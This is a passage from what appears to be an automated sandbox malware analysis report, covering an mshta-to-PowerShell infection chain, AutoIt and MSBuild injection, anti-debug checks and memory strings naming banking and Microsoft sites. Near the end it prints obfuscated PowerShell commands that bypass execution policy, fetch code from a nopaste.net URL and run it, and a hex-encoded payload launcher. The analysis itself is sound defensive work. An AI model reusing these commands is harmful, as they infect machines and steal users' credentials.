                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57596
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48095
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38277
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54262
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39165
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 41851
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48637
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35260
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34191
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 51059
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4dJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\OneCoreCommonProxyStub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\Bcp47Langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile opened: C:\Windows\SysWOW64\USERENV.dllJump to behavior
                    Source: powershell.exe, 00000004.00000002.3838008180.000000000084C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTime-Stamp PCA 2010
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: updater.exe, updater.exe, 0000000E.00000002.1756900327.000000000158D000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1757721647.0000000001678000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1757319973.0000000001617000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1742138516.0000000001627000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1757319973.000000000163C000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1757145974.00000000015EC000.00000040.00000020.00020000.00000000.sdmp, AutoIt3.exe, AutoIt3.exe, 00000010.00000002.1899973326.0000000001027000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1900276497.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1893256271.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1893256271.0000000001116000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft hyper-v video
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: mshta.exe, 00000000.00000003.2570323059.000000000333D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ r
                    Source: powershell.exe, 00000002.00000002.2564889260.00000000082A0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.3836559938.000000000105E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                    Source: mshta.exe, 00000000.00000003.2570323059.000000000333D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: AutoIt3.exe, 00000015.00000002.1974864130.0000000001086000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: MSBuild.exe, 0000000F.00000002.3840592697.0000000002F7D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeAPI call chain: ExitProcess graph end nodegraph_14-111690
                    Source: C:\faggbgb\AutoIt3.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_016041BF LdrInitializeThunk,14_2_016041BF
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_010345D5 BlockInput,14_2_010345D5
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FD5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_00FD5240
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FF5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,14_2_00FF5CAC
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0103C6D9 LoadLibraryA,GetProcAddress,14_2_0103C6D9
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01615E16 mov eax, dword ptr fs:[00000030h]14_2_01615E16
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01603FBD mov eax, dword ptr fs:[00000030h]14_2_01603FBD
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01609EA2 mov eax, dword ptr fs:[00000030h]14_2_01609EA2
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01609EA2 mov eax, dword ptr fs:[00000030h]14_2_01609EA2
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01609EA9 mov eax, dword ptr fs:[00000030h]14_2_01609EA9
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01609EA9 mov eax, dword ptr fs:[00000030h]14_2_01609EA9
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_010A7BFA mov eax, dword ptr fs:[00000030h]16_2_010A7BFA
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_010A7BFA mov eax, dword ptr fs:[00000030h]16_2_010A7BFA
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_010A1D15 mov eax, dword ptr fs:[00000030h]16_2_010A1D15
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_010A7C01 mov eax, dword ptr fs:[00000030h]16_2_010A7C01
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_010A7C01 mov eax, dword ptr fs:[00000030h]16_2_010A7C01
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_010B3B6E mov eax, dword ptr fs:[00000030h]16_2_010B3B6E
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_010188CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,14_2_010188CD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FEA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00FEA385
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FEA354 SetUnhandledExceptionFilter,14_2_00FEA354
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009CA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_009CA385
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_009CA354 SetUnhandledExceptionFilter,16_2_009CA354
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Bypasses PowerShell execution policy
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'}))))
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01019369 LogonUserW,14_2_01019369
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_00FD5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,14_2_00FD5240
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01021AC6 SendInput,keybd_event,14_2_01021AC6
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_010251E2 mouse_event,14_2_010251E2
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function CgMQB($seVe){return -split ($seVe -replace '..', '0x$& ')};$QBRr = CgMQB('619C354D6DB9F3F484D11E37F9A5C98CA2C67AD44869DAD2A1B050859A2F64301D2176E5E02553EC057B7DEFE977761F13EC3B821FD2BF7B61A2835F048AADB9D53EA5090C8A4909936162D4E888EDAE5C2805A7B7078C416E9EBA91A7737860E61CDA680064BEAC6C3B43D4A742CBC7650066B7009F6EED14E649BFE5141BC6820331279B1D91D1AFB9A002D60B1142E4BA80436C1ACBDF43F77D145A1AE776B79BBDC6B49934E8485CE19389F13ED554B250D9069CAAA26C8F20AFA47B2981F495265E62E718988B04FBEC2FAF9362FCCFC8295B4FF36FDF66DC47036B18CF402A773F7EB30CF918CC3523247BC946DD3C5116428886F846518591A5473C4029C6021C9D2E4DC7EC2B2F826CB99917AE10C1E8E375C6DD683272B3A957825DDC8CC3E570E90EAF546E09707A8515195EE8896646E1AC066E5BD2875F82393034B362AB91C9724851B205B4A02975E1B921526387AB1CCF8496B8225171653B45D000624D31EBB8A75E93A4FAEA1DA654CBBD9F01209D48530BDF0222A13A588A75E568B18065FA2534B0792938B38475ABE2BBFA3D79293144E35126501B0636B6C131B9A7E78357B3CAFD6D6FFBFB82F95F053407BD8B91DD016719170A36D88538050AE80A028D7C65871924A588285AB0798B124073A5337B6C7C9F6D791F852F957A88C51CDD5286C788EE800F41905A22D4F3C546EED053C37CA81FAC085A0604145517E387F89209637F36CBDFE3EFA22D81D023E26B486F415A9F60513E1F044BA938BA37A749A7D64E606F389CEA95EDE63FE4D4D0B5318E94946B345978B806EB97BAA7317F0D66441555CD8B0498CBCE4563F27417415532A59009F12D93486BAA576D66E1A94C2FCF0AFF4D97FF6AC0DED5AE9DD1C28BC9FB4B7B32EBAE00E90301C7B10FB256981821BA7D05E59142ED2B63DAF46E3F14731A7EE68FDA15C0ECB85076D5D3C1627FFECC12A8AB2AFA5DCFB028E118D7C7E65F6BDDCC94632D5131D101D2D1AD09C79DF3500ABC5CA72110F7FB629E9784A340DA2F69C7EF41790C7ECF578195A0226541AA005B9576C5DB3EC2D21E43AD093C6007DB20F96D752DDD4CB39BB4B44576D7DF95F0DD75240B1B45D12AD14DD1C62D252B89E4C3F6D7EA6DB64ACD483A82DB456666DDB4E66A704027AAC5243D0FEF1723B6BFBA2507B09B620E2E05AEBA95C5C15912F9762FE744C407625420E36C579137B8DA48E8B2B3D9CEB9EA7D17AF1140852299ADE0A8B44C9F5B84185E999DB924CA89E2381F4C206A8C9AA660F47B148421EB0BA7EBF85A7241C5492982E4137425C91BA9C5DFB91E9CE1808CD8F1A495DB03460FA132E80E1B3E0BE5A128F98183612928708BD201626624B297A12880537A327369FD4E4910DA3FD868CD9EBE5BD79C8442CE12C6C58D0B69BA72E4ED3EAF25028C786F3071CDD15675E2CDE5136736E09A963F3819A8E5CD1D162CFF51D8A4C10143B9819A2FB97A69508DAFC4323924544B31FF36BBAFC96F545ABECE3235E2FFA3205157DD1EBAE29CD05BAB7A53396ACB35F7F234057291F2FD7A472A2618EDC0995E36672AC725DE56E49AF3EDF3D49DABEB7C2E83CD39E4A1E4FD35C3AE52263B5EA0B9C94C447FBB37466E6EFC8913CDAE17BFFF7B13AE3DD38F2D855590BF0F8E86C627D41DF7AD14A562C3E7585030D97BC4B00D705840832C3E7A736A65B9A5DF8180343A6943D342BE79D729D85C9670DBBA11668A04D31F4257B8AC87E18DD94CACE14A949C27E6CCF7B24407AE865A3F706E6C802E46ACD0EE5590E5662C7F9E7F0F86445A3D9A74256659EB54C1EFAB0842363E035766605E44B0A632498B42DF7071A7BEE137394B4BE7714C9295A3BBCBC40ACF9EF837543FB9ABBBDA25577ADB9B87B50D5270E313C6D8E4F78F5E0A28F4AA66FC9FEFCF3EC4C1EF59EF0FDDE684CEE62FDCFB62D4EBA5Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command cd;Set-Variable t8 (.(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('Ne*ct',$TRUE,1))Net.WebClient);SV s 'https://nopaste.net/SFHgtxFGtB';&(Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'*Cm*t'}).Name).Invoke((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand.(((Get-ChildItem Variable:\E*onte*).Value.InvokeCommand|Get-Member|Where-Object{(Get-Variable _).Value.Name-ilike'G*om*e'}).Name).Invoke('In*-Ex*ion',$TRUE,$TRUE))([String]::Join('',(((Get-Item Variable:\t8).Value.((((Get-Item Variable:\t8).Value|Get-Member)|Where-Object{(Get-Variable _).Value.Name-ilike'*nl*a'}).Name).Invoke((GCI Variable:\s).Value)|ForEach{(Get-Item Variable:/_).Value-As'Char'})))) Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\i1040gi.pdf"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\33260509\updater.exe "C:\Users\user\AppData\Local\Temp\33260509\updater.exe" C:\Users\user\AppData\Local\Temp\33260509\JfEljoTl.dll Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\faggbgb\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\faggbgb\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\faggbgb\AutoIt3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function cgmqb($seve){return -split ($seve -replace '..', '0x$& ')};$qbrr = cgmqb('619c354d6db9f3f484d11e37f9a5c98ca2c67ad44869dad2a1b050859a2f64301d2176e5e02553ec057b7defe977761f13ec3b821fd2bf7b61a2835f048aadb9d53ea5090c8a4909936162d4e888edae5c2805a7b7078c416e9eba91a7737860e61cda680064beac6c3b43d4a742cbc7650066b7009f6eed14e649bfe5141bc6820331279b1d91d1afb9a002d60b1142e4ba80436c1acbdf43f77d145a1ae776b79bbdc6b49934e8485ce19389f13ed554b250d9069caaa26c8f20afa47b2981f495265e62e718988b04fbec2faf9362fccfc8295b4ff36fdf66dc47036b18cf402a773f7eb30cf918cc3523247bc946dd3c5116428886f846518591a5473c4029c6021c9d2e4dc7ec2b2f826cb99917ae10c1e8e375c6dd683272b3a957825ddc8cc3e570e90eaf546e09707a8515195ee8896646e1ac066e5bd2875f82393034b362ab91c9724851b205b4a02975e1b921526387ab1ccf8496b8225171653b45d000624d31ebb8a75e93a4faea1da654cbbd9f01209d48530bdf0222a13a588a75e568b18065fa2534b0792938b38475abe2bbfa3d79293144e35126501b0636b6c131b9a7e78357b3cafd6d6ffbfb82f95f053407bd8b91dd016719170a36d88538050ae80a028d7c65871924a588285ab0798b124073a5337b6c7c9f6d791f852f957a88c51cdd5286c788ee800f41905a22d4f3c546eed053c37ca81fac085a0604145517e387f89209637f36cbdfe3efa22d81d023e26b486f415a9f60513e1f044ba938ba37a749a7d64e606f389cea95ede63fe4d4d0b5318e94946b345978b806eb97baa7317f0d66441555cd8b0498cbce4563f27417415532a59009f12d93486baa576d66e1a94c2fcf0aff4d97ff6ac0ded5ae9dd1c28bc9fb4b7b32ebae00e90301c7b10fb256981821ba7d05e59142ed2b63daf46e3f14731a7ee68fda15c0ecb85076d5d3c1627ffecc12a8ab2afa5dcfb028e118d7c7e65f6bddcc94632d5131d101d2d1ad09c79df3500abc5ca72110f7fb629e9784a340da2f69c7ef41790c7ecf578195a0226541aa005b9576c5db3ec2d21e43ad093c6007db20f96d752ddd4cb39bb4b44576d7df95f0dd75240b1b45d12ad14dd1c62d252b89e4c3f6d7ea6db64acd483a82db456666ddb4e66a704027aac5243d0fef1723b6bfba2507b09b620e2e05aeba95c5c15912f9762fe744c407625420e36c579137b8da48e8b2b3d9ceb9ea7d17af1140852299ade0a8b44c9f5b84185e999db924ca89e2381f4c206a8c9aa660f47b148421eb0ba7ebf85a7241c5492982e4137425c91ba9c5dfb91e9ce1808cd8f1a495db03460fa132e80e1b3e0be5a128f98183612928708bd201626624b297a12880537a327369fd4e4910da3fd868cd9ebe5bd79c8442ce12c6c58d0b69ba72e4ed3eaf25028c786f3071cdd15675e2cde5136736e09a963f3819a8e5cd1d162cff51d8a4c10143b9819a2fb97a69508dafc4323924544b31ff36bbafc96f545abece3235e2ffa3205157dd1ebae29cd05bab7a53396acb35f7f234057291f2fd7a472a2618edc0995e36672ac725de56e49af3edf3d49dabeb7c2e83cd39e4a1e4fd35c3ae52263b5ea0b9c94c447fbb37466e6efc8913cdae17bfff7b13ae3dd38f2d855590bf0f8e86c627d41df7ad14a562c3e7585030d97bc4b00d705840832c3e7a736a65b9a5df8180343a6943d342be79d729d85c9670dbba11668a04d31f4257b8ac87e18dd94cace14a949c27e6ccf7b24407ae865a3f706e6c802e46acd0ee5590e5662c7f9e7f0f86445a3d9a74256659eb54c1efab0842363e035766605e44b0a632498b42df7071a7bee137394b4be7714c9295a3bbcbc40acf9ef837543fb9abbbda25577adb9b87b50d5270e313c6d8e4f78f5e0a28f4aa66fc9fefcf3ec4c1ef59ef0fdde684cee62fdcfb62d4eba5
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command cd;set-variable t8 (.(get-childitem variable:\e*onte*).value.invokecommand.(((get-childitem variable:\e*onte*).value.invokecommand|get-member|where-object{(get-variable _).value.name-ilike'*cm*t'}).name).invoke((get-childitem variable:\e*onte*).value.invokecommand.(((get-childitem variable:\e*onte*).value.invokecommand|get-member|where-object{(get-variable _).value.name-ilike'g*om*e'}).name).invoke('ne*ct',$true,1))net.webclient);sv s 'https://nopaste.net/sfhgtxfgtb';&(get-childitem variable:\e*onte*).value.invokecommand.(((get-childitem variable:\e*onte*).value.invokecommand|get-member|where-object{(get-variable _).value.name-ilike'*cm*t'}).name).invoke((get-childitem variable:\e*onte*).value.invokecommand.(((get-childitem variable:\e*onte*).value.invokecommand|get-member|where-object{(get-variable _).value.name-ilike'g*om*e'}).name).invoke('in*-ex*ion',$true,$true))([string]::join('',(((get-item variable:\t8).value.((((get-item variable:\t8).value|get-member)|where-object{(get-variable _).value.name-ilike'*nl*a'}).name).invoke((gci variable:\s).value)|foreach{(get-item variable:/_).value-as'char'}))))
